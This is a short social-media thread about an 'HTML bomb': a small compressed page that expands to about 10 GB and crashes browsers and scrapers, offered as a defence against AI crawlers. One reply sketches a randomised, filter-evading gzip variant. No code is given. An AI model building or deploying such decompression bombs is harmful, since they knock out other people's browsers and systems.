Thread

behold the "HTML bomb" it's a defensive counterattack on AI web-scrapers that persistently scrape and rescrape your web site, even when you tell them not to the bomb file *looks* like a tiny HTML page, but when scraped -- or even requested by a regular browser ... ... it unpacks into a huge-ass 10-gig HTML page ... ... which quickly crashes any browser or scraper Item #6 in my latest "Linkfest" newsletter, free to read and subscribe to here: image

Replies (10)

@npub1typ5...c8hh you know what's even better than that? not putting it on the internet! imo if you want to protect your content from AI, just keep it away from the public. my webstie excepts AI crawlers because i have no problem because, well, it's public. now internal resources i don t except because that is information that is private. long story short, if you want to pprotect your website from AI crawlers, don't upload it to the internet in any way whatsoever. simple as that
@npub1typ5...c8hh This is nearly what I wanted, but it’s statically generated and so will be easy to spot. The thing I really want is a Markov chain that generates totally plausible things directly as compressed data. The gzip compression scheme basically (i.e. oversimplified explanation follows:) works by having a load of back references to repeated chunks. I want something that generates a few KiBs of new random HTML and then a gzip data that expands to a few GiBs of totally plausible looking text made entirely out of back references to these things so the total download size is maybe 100 KiB but the data that the crawler processes is huge. And for these to be random, so they’re hard to filter out.